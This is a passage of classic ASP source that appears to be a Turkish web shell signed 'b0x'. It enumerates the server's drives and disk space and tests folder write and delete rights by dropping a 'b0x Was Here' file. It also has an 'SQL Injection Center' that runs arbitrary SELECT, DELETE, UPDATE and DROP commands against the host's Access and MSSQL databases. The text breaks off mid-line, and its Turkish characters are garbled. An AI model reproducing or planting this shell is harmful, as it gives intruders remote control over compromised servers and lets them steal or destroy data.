if drive_.Drivetype=3 then Response.write " <font class=""k1"">;</font> C?kar?labilir Disk [" & drive_.DriveLetter & ":] <a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
if drive_.Drivetype=4 then Response.write " <font class=""k2"">?³</font> Cd-Rom [" & drive_.DriveLetter & ":] <a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
Response.Write "</a></td></tr>"
next
Response.Write "<tr bgcolor=""#3a3a3a""><td class=""kbrtm"" height=""20""> <a href="" "&FilePath&" ""><font class=""k2"">H</font> Local Path </a></td></tr>"
end sub
Sub SurucuInfo
'Disk Alan?n? G?sterir - Coded Developed By TurkisH-RuleZ
DriveSpace = Request("dspace")
If Not DriveSpace = "" Then
on error resume next
Set driveObject = b0x.GetDrive(DriveSpace)
D1 = Left((driveObject.FreeSpace/(driveObject.TotalSize*1.0))*100.0, 4)
if err <> 0 then
response.write "<center><br> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Disk Haz?r de?il !!!! :( <font face=Wingdings size=5>N</font></font> <br></center>"
else
D2 = Left(((driveObject.TotalSize - driveObject.FreeSpace)/(driveObject.TotalSize*1.0))*100.0, 4)
D3 = 100
D1a = 110 - D1
D2a = 110 - D2
D3a = 110 - D3
Response.Write "<br><center><table cellspacing=0 cellpadding=0><tr><td style='background-color: #121212;' colspan=4 align=center class=kbrtm><b>Disk :</b> " & driveObject.DriveLetter & "</td></tr><tr><td class=kbrtm width=60> </td><td class=kbrtm width=100 align=center><b>Bo? Alan</b></td><td class=kbrtm width=100 align=center><b>Kullan?lan Alan</b></td><td class=kbrtm width=100 align=center><b>Toplam Alan</b></td></tr><tr><td height=110 class=kbrtm> </td><td class=kbrtm align=center><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D1a&"></td></tr><tr height="&D1&"><td bgcolor=#009900 width=2></td><td bgcolor=#33CC00 width=15></td><td bgcolor=#009900 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D2a&"></td></tr><tr height="&D2&"><td bgcolor=#990000 width=2></td><td bgcolor=#CC0000 width=15></td><td bgcolor=#990000 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D3a&"></td></tr><tr height="&D3&"><td bgcolor=#006699 width=2></td><td bgcolor=#0088CC width=15></td><td bgcolor=#006699 width=2></td></tr></table></td></tr><tr><td class=kbrtm> <b>Y?zde :</b></td><td class=kbrtm align=center>"&D1&" %</td><td class=kbrtm align=center>"&D2&" %</td><td class=kbrtm align=center>"&D3&" %</td></tr><tr><td class=kbrtm> <b>Boyut :</b></td><td class=kbrtm align=center> " & FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center> " & FormatNumber(driveObject.TotalSize / 1048576) - FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center> " & FormatNumber(driveObject.TotalSize / 1048576) & " MB</td></tr></table></center><br><br><br>"
end if
Set driveObject = Nothing
End If
end sub
sub yetkino(str)
response.write "<td class=""kbrtm""> <b><font color=#FBE1D7>"&str&" :</font></b> <font color=#FE7A84 class=""k1"">?</font> </td>"
End Sub
sub yetkiyes(str)
response.write "<td class=""kbrtm""> <b><font color=#FAFEDE>"&str&" :</font></b> <font color=#C6FCBE class=""k1"">?</font> </td>"
end Sub
sub Yetki
on error resume next
Set f = b0x.GetFolder(FolderPath)
if err<>0 then
yetkino("Reading ")
yetkino("Writing ")
yetkino("Deleting ")
else
yetkiyes("Reading ")
on error resume next
Set MyFile = b0x.CreateTextFile(FolderPath & "test.b0x", True)
MyFile.write "b0x Was Here... =) Writing - Reading Testi i?in"
set MyFile = Nothing
if err<>0 then
yetkino("Writing ")
yetkino("Deleting ")
else
yetkiyes("Writing ")
on error resume next
b0x.DeleteFile FolderPath & "test.b0x",true
if err<>0 then
yetkino("Deleting ")
else
yetkiyes("Deleting ")
end if
end if
end if
set f = nothing
end sub
Sub olmadi(str)
response.write "<br><center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&str&" :( <font face=Wingdings size=5>N</font> </font></center>"
End Sub
Sub oldu(str)
response.write "<br><center><font color=#C6FCBE> <font face=Wingdings size=5>N</font> "&str&" ;) Tebrikler ??lem Ba?ar?yla Ger?ekle?tirildi.. by b0x <font face=Wingdings size=5>N</font> </font></center>"
End Sub
Sub tablo12(str)
response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo30(str)
response.write "<tr bgcolor=""#303030""><td class=""kbrtm"" align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo12L(str)
response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo12O(str)
response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
sub Status
if err<>0 then
Response.Write "<center><font color=red size=2>Status : "&err.Description&"</font></center>"
end if
end sub
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function
Sub SQL_menu_by_b0x
response.write "<center><table width=""450"">"
response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"
response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
tablo30(" <b>SQL ?njection Merkezi</b>")
tablo30(" ")
tablo12("<font color=#FE7A84> Kullanabilmeniz i?in SQL kou?tlar? bilmeniz gerek !!! <br> <font face=Wingdings size=5>N</font> Aksi Halde ASP DOsya? Kitlenir. Cevap veremez. Server a Zarar verir. <font face=Wingdings size=5>N</font></font>")
tablo12(" Select <input value=""select"" type=""radio"" name=""islem"" checked> <input size=""60"" type=""text"" name=""inject1"" value='Select * from "&table&"'>")
tablo12(" Delete <input value=""delete"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject2"" value='Delete from "&table&"'>")
tablo12(" Insert <input value=""insert"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject3"" value='Insert into "&table&" () values ()'>")
tablo12(" Update <input value=""update"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject4"" value='Update "&table&" set .. where ..'>")
tablo12(" Di?er <input value=""diger"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject5"" value='Drop "&table&"'>")
tablo12("<input name=""mode"" type=""hidden"" value='15' ><input name=""sec"" type=""hidden"" value='"&sec&"' ><input name=""b0xsql"" type=""hidden"" value='"&b0xsql&"' ><input name=""file"" type=""hidden"" value='"&file&"' ><input name=""Path"" type=""hidden"" value='"&FolderPath&"' ><input name=""table"" type=""hidden"" value='"&table&"' ><br><input value="" SQL ?nj. Uygula "" type=""Submit""><br><br>")
if b0xsql = "" then
tablo12("<a href='"&FilePath&"?mode=13&file="&file&"&Path="&FolderPath&"&Time="&time&"'> .... ::: Tablolara Geri D?n ::: .... </a><br>")
else
tablo12("<a href='"&FilePath&"?mode=34&file="&file&"&Path="&Path&"&b0xsql="&b0xsql&"&islem=1&Time="&time&"'> .... ::: Tablolara Geri D?n ::: .... </a><br>")
end if
response.write "</form></table></td></tr></table><br></center>"
response.write "<table align=""center"" class=""kbrtm""><tr><td align='center'> <a href='"&FilePath&"?mode=36&Path="&Path&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>...:::::: SQL Komut Yard?m - Kullan?m Klavuzu by b0x ::::::...</b></a> </td></tr></table><br>"
end sub
Sub SQL_by_b0x(sqlPath,sqlkomut)
on error resume next
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = sqlPath
objConn.Open
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Ba?lant?n?z Sa?lanamad? !!! by b0x :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
on error resume next
objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL ?njection Komutunuzda Status var. ( Bilmiyorsan KullanMA :) ) by b0x <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td><font color=black><b> "&objRcs.Fields(i).Name&" </font></td>"
next
Response.Write "</tr>"
do while not objRcs.EOF
Response.Write "<tr class=""kbrtm"">"
for i=0 to objRcs.Fields.count-1
Response.Write "<td class=""kbrtm"">"&Replace(objRcs.Fields(i).Value,"<","<")&" </td>"
next
Response.Write "</tr>"
objRcs.MoveNext
loop
Response.Write "</table><br></center>"
end if
end if
end sub
Sub MSSQL_by_b0x(sqlPath,sqlkomut)
on error resume next
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Open sqlPath
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Ba?lant?n?z Sa?lanamad?? !!! by b0x :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font